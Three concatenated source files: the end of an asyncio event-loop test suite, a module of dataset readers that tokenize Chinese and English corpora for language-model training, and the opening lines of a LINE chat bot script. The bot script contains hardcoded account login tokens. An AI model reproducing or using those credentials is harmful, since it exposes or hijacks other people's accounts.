m_socket.socket.return_value = mock.Mock()
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_soreuseport_only_defined(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.return_value = mock.Mock()
m_socket.SO_REUSEPORT = -1
f = self.loop.create_server(
MyProto, '0.0.0.0', 0, reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, f)
@patch_socket
def test_create_server_cant_bind(self, m_socket):
class Err(OSError):
strerror = 'error'
m_socket.getaddrinfo.return_value = [
(2, 1, 6, '', ('127.0.0.1', 10100))]
m_socket.getaddrinfo._is_coroutine = False
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_server(MyProto, '0.0.0.0', 0)
self.assertRaises(OSError, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
@patch_socket
def test_create_datagram_endpoint_no_addrinfo(self, m_socket):
m_socket.getaddrinfo.return_value = []
m_socket.getaddrinfo._is_coroutine = False
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_addr_error(self):
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr='localhost')
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('localhost', 1, 2, 3))
self.assertRaises(
AssertionError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_connect_err(self):
self.loop.sock_connect = mock.Mock()
self.loop.sock_connect.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, remote_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
def test_create_datagram_endpoint_allow_broadcast(self):
protocol = MyDatagramProto(create_future=True, loop=self.loop)
self.loop.sock_connect = sock_connect = mock.Mock()
sock_connect.return_value = []
coro = self.loop.create_datagram_endpoint(
lambda: protocol,
remote_addr=('127.0.0.1', 0),
allow_broadcast=True)
transport, _ = self.loop.run_until_complete(coro)
self.assertFalse(sock_connect.called)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_socket_err(self, m_socket):
m_socket.getaddrinfo = socket.getaddrinfo
m_socket.socket.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, local_addr=('127.0.0.1', 0))
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_no_matching_family(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol,
remote_addr=('127.0.0.1', 0), local_addr=('::1', 0))
self.assertRaises(
ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_setblk_err(self, m_socket):
m_socket.socket.return_value.setblocking.side_effect = OSError
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol, family=socket.AF_INET)
self.assertRaises(
OSError, self.loop.run_until_complete, coro)
self.assertTrue(
m_socket.socket.return_value.close.called)
def test_create_datagram_endpoint_noaddr_nofamily(self):
coro = self.loop.create_datagram_endpoint(
asyncio.DatagramProtocol)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_cant_bind(self, m_socket):
class Err(OSError):
pass
m_socket.getaddrinfo = socket.getaddrinfo
m_sock = m_socket.socket.return_value = mock.Mock()
m_sock.bind.side_effect = Err
fut = self.loop.create_datagram_endpoint(
MyDatagramProto,
local_addr=('127.0.0.1', 0), family=socket.AF_INET)
self.assertRaises(Err, self.loop.run_until_complete, fut)
self.assertTrue(m_sock.close.called)
def test_create_datagram_endpoint_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('127.0.0.1', 0))
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
sock=sock)
transport, protocol = self.loop.run_until_complete(fut)
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_sock_unix(self):
fut = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(fut)
assert transport._sock.family == socket.AF_UNIX
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'No UNIX Sockets')
def test_create_datagram_endpoint_existing_sock_unix(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX, type=socket.SOCK_DGRAM)
sock.bind(path)
sock.close()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
path, family=socket.AF_UNIX)
transport, protocol = self.loop.run_until_complete(coro)
transport.close()
self.loop.run_until_complete(protocol.done)
def test_create_datagram_endpoint_sock_sockopts(self):
class FakeSock:
type = socket.SOCK_DGRAM
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, local_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, remote_addr=('127.0.0.1', 0), sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, family=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, proto=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, flags=1, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_address=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, reuse_port=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
fut = self.loop.create_datagram_endpoint(
MyDatagramProto, allow_broadcast=True, sock=FakeSock())
self.assertRaises(ValueError, self.loop.run_until_complete, fut)
def test_create_datagram_endpoint_sockopts(self):
# Socket options should not be applied unless asked for.
# SO_REUSEADDR defaults to on for UNIX.
# SO_REUSEPORT is not available on all platforms.
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0))
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
reuse_address_default_on = (
os.name == 'posix' and sys.platform != 'cygwin')
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
if reuse_address_default_on:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
else:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertFalse(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(create_future=True, loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=True,
reuse_port=reuseport_supported,
allow_broadcast=True)
transport, protocol = self.loop.run_until_complete(coro)
sock = transport.get_extra_info('socket')
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEADDR))
if reuseport_supported:
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_REUSEPORT))
self.assertTrue(
sock.getsockopt(
socket.SOL_SOCKET, socket.SO_BROADCAST))
transport.close()
self.loop.run_until_complete(protocol.done)
self.assertEqual('CLOSED', protocol.state)
@patch_socket
def test_create_datagram_endpoint_nosoreuseport(self, m_socket):
del m_socket.SO_REUSEPORT
m_socket.socket.return_value = mock.Mock()
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('127.0.0.1', 0),
reuse_address=False,
reuse_port=True)
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
@patch_socket
def test_create_datagram_endpoint_ip_addr(self, m_socket):
def getaddrinfo(*args, **kw):
self.fail('should not have called getaddrinfo')
m_socket.getaddrinfo = getaddrinfo
m_socket.socket.return_value.bind = bind = mock.Mock()
self.loop._add_reader = mock.Mock()
self.loop._add_reader._is_coroutine = False
reuseport_supported = hasattr(socket, 'SO_REUSEPORT')
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
local_addr=('1.2.3.4', 0),
reuse_address=False,
reuse_port=reuseport_supported)
t, p = self.loop.run_until_complete(coro)
try:
bind.assert_called_with(('1.2.3.4', 0))
m_socket.socket.assert_called_with(family=m_socket.AF_INET,
proto=m_socket.IPPROTO_UDP,
type=m_socket.SOCK_DGRAM)
finally:
t.close()
test_utils.run_briefly(self.loop) # allow transport to close
def test_accept_connection_retry(self):
sock = mock.Mock()
sock.accept.side_effect = BlockingIOError()
self.loop._accept_connection(MyProto, sock)
self.assertFalse(sock.close.called)
@mock.patch('asyncio.base_events.logger')
def test_accept_connection_exception(self, m_log):
sock = mock.Mock()
sock.fileno.return_value = 10
sock.accept.side_effect = OSError(errno.EMFILE, 'Too many open files')
self.loop._remove_reader = mock.Mock()
self.loop.call_later = mock.Mock()
self.loop._accept_connection(MyProto, sock)
self.assertTrue(m_log.error.called)
self.assertFalse(sock.close.called)
self.loop._remove_reader.assert_called_with(10)
self.loop.call_later.assert_called_with(
constants.ACCEPT_RETRY_DELAY,
# self.loop._start_serving
mock.ANY,
MyProto, sock, None, None, mock.ANY, mock.ANY)
def test_call_coroutine(self):
with self.assertWarns(DeprecationWarning):
@asyncio.coroutine
def simple_coroutine():
pass
self.loop.set_debug(True)
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
with self.assertRaises(TypeError):
self.loop.call_soon(func)
with self.assertRaises(TypeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(TypeError):
self.loop.call_later(60, func)
with self.assertRaises(TypeError):
self.loop.call_at(self.loop.time() + 60, func)
with self.assertRaises(TypeError):
self.loop.run_until_complete(
self.loop.run_in_executor(None, func))
@mock.patch('asyncio.base_events.logger')
def test_log_slow_callbacks(self, m_logger):
def stop_loop_cb(loop):
loop.stop()
async def stop_loop_coro(loop):
loop.stop()
asyncio.set_event_loop(self.loop)
self.loop.set_debug(True)
self.loop.slow_callback_duration = 0.0
# slow callback
self.loop.call_soon(stop_loop_cb, self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Handle.*stop_loop_cb.*> "
"took .* seconds$")
# slow task
asyncio.ensure_future(stop_loop_coro(self.loop), loop=self.loop)
self.loop.run_forever()
fmt, *args = m_logger.warning.call_args[0]
self.assertRegex(fmt % tuple(args),
"^Executing <Task.*stop_loop_coro.*> "
"took .* seconds$")
class RunningLoopTests(unittest.TestCase):
def test_running_loop_within_a_loop(self):
async def runner(loop):
loop.run_forever()
loop = asyncio.new_event_loop()
outer_loop = asyncio.new_event_loop()
try:
with self.assertRaisesRegex(RuntimeError,
'while another loop is running'):
outer_loop.run_until_complete(runner(loop))
finally:
loop.close()
outer_loop.close()
class BaseLoopSockSendfileTests(test_utils.TestCase):
DATA = b"12345abcde" * 16 * 1024 # 160 KiB
class MyProto(asyncio.Protocol):
def __init__(self, loop):
self.started = False
self.closed = False
self.data = bytearray()
self.fut = loop.create_future()
self.transport = None
def connection_made(self, transport):
self.started = True
self.transport = transport
def data_received(self, data):
self.data.extend(data)
def connection_lost(self, exc):
self.closed = True
self.fut.set_result(None)
self.transport = None
async def wait_closed(self):
await self.fut
@classmethod
def setUpClass(cls):
cls.__old_bufsize = constants.SENDFILE_FALLBACK_READBUFFER_SIZE
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = 1024 * 16
with open(support.TESTFN, 'wb') as fp:
fp.write(cls.DATA)
super().setUpClass()
@classmethod
def tearDownClass(cls):
constants.SENDFILE_FALLBACK_READBUFFER_SIZE = cls.__old_bufsize
support.unlink(support.TESTFN)
super().tearDownClass()
def setUp(self):
from asyncio.selector_events import BaseSelectorEventLoop
# BaseSelectorEventLoop() has no native implementation
self.loop = BaseSelectorEventLoop()
self.set_event_loop(self.loop)
self.file = open(support.TESTFN, 'rb')
self.addCleanup(self.file.close)
super().setUp()
def make_socket(self, blocking=False):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(blocking)
self.addCleanup(sock.close)
return sock
def run_loop(self, coro):
return self.loop.run_until_complete(coro)
def prepare(self):
sock = self.make_socket()
proto = self.MyProto(self.loop)
server = self.run_loop(self.loop.create_server(
lambda: proto, support.HOST, 0, family=socket.AF_INET))
addr = server.sockets[0].getsockname()
for _ in range(10):
try:
self.run_loop(self.loop.sock_connect(sock, addr))
except OSError:
self.run_loop(asyncio.sleep(0.5))
continue
else:
break
else:
# One last try, so we get the exception
self.run_loop(self.loop.sock_connect(sock, addr))
def cleanup():
server.close()
self.run_loop(server.wait_closed())
sock.close()
if proto.transport is not None:
proto.transport.close()
self.run_loop(proto.wait_closed())
self.addCleanup(cleanup)
return sock, proto
def test__sock_sendfile_native_failure(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop._sock_sendfile_native(sock, self.file,
0, None))
self.assertEqual(proto.data, b'')
self.assertEqual(self.file.tell(), 0)
def test_sock_sendfile_no_fallback(self):
sock, proto = self.prepare()
with self.assertRaisesRegex(asyncio.SendfileNotAvailableError,
"sendfile is not available"):
self.run_loop(self.loop.sock_sendfile(sock, self.file,
fallback=False))
self.assertEqual(self.file.tell(), 0)
self.assertEqual(proto.data, b'')
def test_sock_sendfile_fallback(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, len(self.DATA))
self.assertEqual(self.file.tell(), len(self.DATA))
self.assertEqual(proto.data, self.DATA)
def test_sock_sendfile_fallback_offset_and_count(self):
sock, proto = self.prepare()
ret = self.run_loop(self.loop.sock_sendfile(sock, self.file,
1000, 2000))
sock.close()
self.run_loop(proto.wait_closed())
self.assertEqual(ret, 2000)
self.assertEqual(self.file.tell(), 3000)
self.assertEqual(proto.data, self.DATA[1000:3000])
def test_blocking_socket(self):
self.loop.set_debug(True)
sock = self.make_socket(blocking=True)
with self.assertRaisesRegex(ValueError, "must be non-blocking"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_nonbinary_file(self):
sock = self.make_socket()
with open(support.TESTFN, 'r') as f:
with self.assertRaisesRegex(ValueError, "binary mode"):
self.run_loop(self.loop.sock_sendfile(sock, f))
def test_nonstream_socket(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.setblocking(False)
self.addCleanup(sock.close)
with self.assertRaisesRegex(ValueError, "only SOCK_STREAM type"):
self.run_loop(self.loop.sock_sendfile(sock, self.file))
def test_notint_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, 'count'))
def test_negative_count(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"count must be a positive integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 0, -1))
def test_notint_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(TypeError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, 'offset'))
def test_negative_offset(self):
sock = self.make_socket()
with self.assertRaisesRegex(ValueError,
"offset must be a non-negative integer"):
self.run_loop(self.loop.sock_sendfile(sock, self.file, -1))
class TestSelectorUtils(test_utils.TestCase):
def check_set_nodelay(self, sock):
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertFalse(opt)
base_events._set_nodelay(sock)
opt = sock.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)
self.assertTrue(opt)
@unittest.skipUnless(hasattr(socket, 'TCP_NODELAY'),
'need socket.TCP_NODELAY')
def test_set_nodelay(self):
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
self.check_set_nodelay(sock)
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
proto=socket.IPPROTO_TCP)
with sock:
sock.setblocking(False)
self.check_set_nodelay(sock)
if __name__ == '__main__':
unittest.main()
|
corpora.py
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""several datasets with preset arguments"""
from .datasets import json_dataset, csv_dataset
import os
import json
import random
import tqdm
from multiprocessing import Queue, Process
from queue import Empty
from collections import defaultdict
from torch.utils import data
from .lazy_loader import LazyLoader
from utils import print_rank_0
NUM_PROCESSES = 100
class KeyDataset(data.Dataset):
def __init__(self, text_loader, mask_loader, **kwargs):
self.texts = text_loader
self.masks = mask_loader
self.is_lazy = False
if isinstance(self.texts, LazyLoader) and isinstance(self.masks, LazyLoader):
self.text_lens = self.texts.lens
self.is_lazy = True
def get_text_len(self, idx):
return self.text_lens[idx]
def __getitem__(self, index):
text = self.texts[index]
mask_length = self.masks[index]
mask = []
for i, length in enumerate(mask_length):
if i % 2 == 0:
mask += [0] * length
else:
mask += [1] * length
assert len(text) == len(mask)
return {"tokens": text, "loss_masks": mask}
def __len__(self):
return len(self.texts)
class PromptDataset(data.Dataset):
def __init__(self, prompt_loader, text_loader, tokenizer=None, to_tokenize=False, **kwargs):
self.prompts = prompt_loader
self.texts = text_loader
self.tokenizer = tokenizer
self.to_tokenize = to_tokenize
if isinstance(self.prompts, LazyLoader) and isinstance(self.texts, LazyLoader):
self.prompt_lens = self.prompts.lens
self.text_lens = self.texts.lens
self.is_lazy = True
def get_text_len(self, idx):
return self.prompt_lens[idx] + self.text_lens[idx]
def __getitem__(self, index):
prompt = self.prompts[index]
text = self.texts[index]
if self.to_tokenize:
prompt = self.tokenizer.EncodeAsIds(prompt).tokenization
text = self.tokenizer.EncodeAsIds(text).tokenization
return {"tokens": prompt + text, "loss_masks": [0] * len(prompt) + [1] * len(text)}
def __len__(self):
return len(self.prompts)
class DataReader:
PATH = None
assert_str = None
@classmethod
def tokenize_worker(cls, input, output, info, reader, tokenizer, tokenize):
raise NotImplementedError
def print_info(self, info):
pass
def __init__(self, writers, tokenizer=None, tokenize=False, **kwargs):
assert os.path.exists(self.PATH), self.assert_str
self.tokenizer = tokenizer
self.tokenize = tokenize
self.writers = writers
if os.path.isdir(self.PATH):
paths = [entry.path for entry in os.scandir(self.PATH) if
not entry.is_dir() and not entry.name.endswith("bz2")]
else:
paths = [self.PATH]
task_queue, done_queue, info_queue = Queue(maxsize=10000000), Queue(maxsize=10000000), Queue()
processes = []
for i in range(NUM_PROCESSES):
process = Process(target=self.tokenize_worker,
args=(task_queue, done_queue, info_queue, type(self), tokenizer, tokenize))
process.start()
processes.append(process)
def read_input_to_queue():
for path in paths:
print_rank_0(f"Start reading {path}")
with open(path) as file:
for row in file:
task_queue.put(row)
print_rank_0("Read input complete")
for i in range(len(processes)):
task_queue.put('STOP')
process = Process(target=read_input_to_queue)
process.start()
count = len(processes)
progress_bar = tqdm.tqdm()
while True:
data = done_queue.get()
if data == 'COMPLETE':
count -= 1
if count == 0:
break
else:
self.write_result(data, self.writers)
progress_bar.update()
progress_bar.close()
self.print_info(info_queue)
@staticmethod
def write_result(data, writers):
raise NotImplementedError
@staticmethod
def get_token_count(contents):
return sum(map(len, contents))
@staticmethod
def process_sample(text, tokenizer, tokenize):
if isinstance(text, str) and tokenize:
text = tokenizer.EncodeAsIds(text).tokenization if text else []
return text
@staticmethod
def trim_field(content, max_length):
if len(content) > max_length:
content = content[:max_length]
content += "......"
return content
@classmethod
def process_line(cls, data, tokenizer, tokenize):
raise NotImplementedError
class PromptReader(DataReader):
is_json = True
@classmethod
def tokenize_worker(cls, input, output, info, reader, tokenizer, tokenize):
for row in iter(input.get, 'STOP'):
row = row.rstrip()
if row:
if cls.is_json:
row = json.loads(row)
prompts, texts = reader.process_line(row, tokenizer, tokenize)
for prompt, text in zip(prompts, texts):
output.put((prompt, text))
output.put("COMPLETE")
@staticmethod
def write_result(data, writers):
prompt, text = data
writers['prompt'].write(prompt)
writers['text'].write(text)
class KeyReader(DataReader):
PATH = '/root/data/wikipedia/wiki-key.txt'
assert_str = "make sure to set PATH for wikipedia data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
keys, contents = data['key'], data["content"]
assert len(keys) == len(contents)
for i in range(1, len(keys)):
keys[i] = " " + keys[i]
contents = [" " + content for content in contents]
keys = [tokenizer.EncodeAsIds(key).tokenization for key in keys]
contents = [tokenizer.EncodeAsIds(content).tokenization for content in contents]
summary = sum(keys, [])
summary_prefix = cls.process_sample("Summary: ", tokenizer, tokenize)
summary_mask = [len(summary_prefix), len(summary)]
summary = summary_prefix + summary
text, text_mask = [], []
for key, content in zip(keys, contents):
content = content + [tokenizer.get_command('eop').Id]
text += key
text += content
text_mask.append(len(key))
text_mask.append(len(content))
return (summary, summary_mask), (text, text_mask)
@classmethod
def tokenize_worker(cls, input, output, reader, tokenizer, tokenize):
for row in iter(input.get, 'STOP'):
data = json.loads(row)
summary, content = reader.process_line(data, tokenizer, tokenize)
output.put((summary, content))
output.put("COMPLETE")
@staticmethod
def write_result(data, writers):
summary, content = data
writers['text'].write(summary[0])
writers['mask'].write(summary[1])
writers['text'].write(content[0])
writers['mask'].write(content[1])
class zhihu(PromptReader):
PATH = "/root/data/zhihu/zhihu"
# PATH = "data/zhihu/data.json"
assert_str = "make sure to set PATH for zhihu data_utils/corpora.py"
qtitle_prefix = "问题:"
qcontent_prefix = "问题描述:"
user_prefix = "回答用户:"
answer_prefix = " 回答:"
# qtitle_prefix = []
# qcontent_prefix = []
# user_prefix = []
# answer_prefix = []
@classmethod
def process_line(cls, data, tokenizer, tokenize):
prompts, texts = [], []
ans_length = len(data.get("ans-content", ""))
ans_up = data.get("ans-up-num", "")
ans_up = int(ans_up) if ans_up else 0
if ans_length > 100 or ans_up > 1000:
qtitle = data["q_title"]
qcontent = data["q-content"]
if qcontent is None:
qcontent = ""
qcontent = cls.trim_field(qcontent, max_length=100)
user = data.get("user-signature", "")
prompt = cls.qtitle_prefix + qtitle + cls.qcontent_prefix + qcontent + cls.user_prefix + user + cls.answer_prefix
text = data["ans-content"]
prompt, text = cls.process_sample(prompt, tokenizer, tokenize), cls.process_sample(text, tokenizer,
tokenize)
prompts.append(prompt)
texts.append(text)
# prompt = data["q_title"] + data["q-content"] + data["user-signature"]
# text = data["ans-content"]
# prompts.append(prompt)
# texts.append(text)
return prompts, texts
class zhidao(PromptReader):
PATH = "/root/data/zhidao/zhidao"
assert_str = "make sure to set PATH for zhidao data_utils/corpora.py"
qtitle_prefix = "问题:"
qcontent_prefix = "问题描述:"
answer_prefix = "回答:"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
if "title" not in data:
return [], []
prompts, texts = [], []
qtitle = data["title"]
qcontent = data.get("content", "")
qcontent = cls.trim_field(qcontent, max_length=100)
prompt = cls.qtitle_prefix + qtitle + cls.qcontent_prefix + qcontent + cls.answer_prefix
prompt = cls.process_sample(prompt, tokenizer, tokenize)
if "best_answer" in data:
text = data["best_answer"]["content"]
if len(text) > 10:
text = cls.process_sample(text, tokenizer, tokenize)
prompts.append(prompt)
texts.append(text)
for answer in data.get("other_answers", []):
text = answer["content"]
if len(text) > 100:
text = cls.process_sample(text, tokenizer, tokenize)
prompts.append(prompt)
texts.append(text)
return prompts, texts
class baike(PromptReader):
PATH = "/root/data/baike/baike"
assert_str = "make sure to set PATH for baike data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
prompts, texts = [], []
text = data.get("title", "") + data.get("abstract", "") + data.get("content", "")
if text:
p, t = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
prompts.append(p)
texts.append(t)
return prompts, texts
class wikipedia(PromptReader):
"""
dataset for wikipedia with arguments configured for convenience
command line usage: `--train-data wikipedia`
"""
# PATH = '/dataset/data/wiki.txt'
PATH = '/root/data/bert_data/wiki.txt'
assert_str = "make sure to set PATH for wikipedia data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
text = data['text']
prompt, text = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
return [prompt], [text]
class TestDataset(PromptReader):
PATH = '/root/data/test.json'
assert_str = "make sure to set PATH for wikipedia data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
prompt, text = data['prompt'], data['text']
prompt, text = cls.process_sample(prompt, tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
return [prompt], [text]
class OpenWebText(PromptReader):
PATH = '/root/data/openwebtext2'
assert_str = "make sure to set PATH for openwebtext data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
text = data['text']
if len(text) > 100:
prompt, text = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
return [prompt], [text]
else:
return [], []
class CCNews(PromptReader):
PATH = "/root/data/cc_news"
assert_str = "make sure to set PATH for cc-news data_utils/corpora.py"
@classmethod
def process_line(cls, data, tokenizer, tokenize):
text = ""
title = data.get("title", None)
description = data.get("description", None)
maintext = data.get("maintext", None)
if title:
text += title.strip() + " "
if description and (not maintext or not maintext.startswith(description)):
text += description.strip() + " "
if maintext:
text += maintext
if len(text) > 100:
prompt, text = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer, tokenize)
return [prompt], [text]
else:
return [], []
class BertData(PromptReader):
is_json = False
PATH = '/dataset/fd5061f6/english_data/wikibook'
@classmethod
def process_line(cls, data, tokenizer, tokenize):
if data:
prompt, text = "", data
prompt, text = cls.process_sample(prompt, tokenizer, tokenize), cls.process_sample(text, tokenizer,
tokenize)
return [prompt], [text]
else:
return [], []
class Pile(PromptReader):
is_json = True
PATH = "/dataset/fd5061f6/english_data/pile/train"
filtered_sources = ["Github", "StackExchange", "DM Mathematics", "Ubuntu IRC", "EuroParl", "YoutubeSubtitles",
"Enron Emails"]
downsample_sources = {"PubMed Central": 0.3, "ArXiv": 0.3, "FreeLaw": 0.3}
def print_info(self, info):
total_dict = defaultdict(int)
while True:
try:
source_dict = info.get(block=False)
for source, length in source_dict.items():
total_dict[source] += length
except Empty:
break
print_rank_0(total_dict)
@classmethod
def tokenize_worker(cls, input, output, info, reader, tokenizer, tokenize):
source_dict = defaultdict(int)
for row in iter(input.get, 'STOP'):
row = row.rstrip()
if row:
if cls.is_json:
row = json.loads(row)
prompts, texts, source = reader.process_line(row, tokenizer, tokenize)
length = 0
for prompt, text in zip(prompts, texts):
length += len(text)
output.put((prompt, text))
if source:
source_dict[source] += length
output.put("COMPLETE")
info.put(source_dict)
@classmethod
def process_line(cls, data, tokenizer, tokenize):
source = data["meta"].get("pile_set_name", None)
text = data.get("text", None)
if source and text:
if source in cls.filtered_sources:
return [], [], None
elif source in cls.downsample_sources and random.random() > cls.downsample_sources[source]:
return [], [], None
else:
prompt, text = cls.process_sample("", tokenizer, tokenize), cls.process_sample(text, tokenizer,
tokenize)
return [prompt], [text], source
else:
return [], [], None
class BertBaseData(BertData):
PATH = '/root/data/formatted_one_article_per_line'
class BertLargeData(BertData):
PATH = '/root/data/formatted_one_article_per_line_large'
NAMED_CORPORA = {
'wikipedia': wikipedia,
'wikipedia-key': KeyReader,
'openwebtext': OpenWebText,
"zhihu": zhihu,
"zhidao": zhidao,
"baike": baike,
"test": TestDataset,
'wikibook': BertData,
"bert-base": BertBaseData,
"bert-large": BertLargeData,
'cc-news': CCNews,
'pile': Pile
}
|
bot.py
|
# -*- coding: utf-8 -*-
import LineAlpha
from LineAlpha.lib.curve.ttypes import *
from datetime import datetime
from imgurpython import ImgurClient
import time,random,sys,json,codecs,threading,glob,os,subprocess,multiprocessing
cl = LineAlpha.LINE()
cl.login(token="EkeaUw67d8l1ksWaRIf9.VPm++2MfGJebW2j6OM3Qcq.N8RkI8fzMpTI6SkoxX1gg/yZcvpOp2GmCubdVUizk/I=")
cl.loginResult()
kk = LineAlpha.LINE()
kk.login(token="EkGIlVSPEV2reF9yJPV5.YmK3RE2Gh7r1rsdbSBQibq.tKU1hvspJfPh6q1vCZfK8M8+U0/B8bWA3FsxqPS7pMM=")
kk.loginResult()
ki = LineAlpha.LINE()
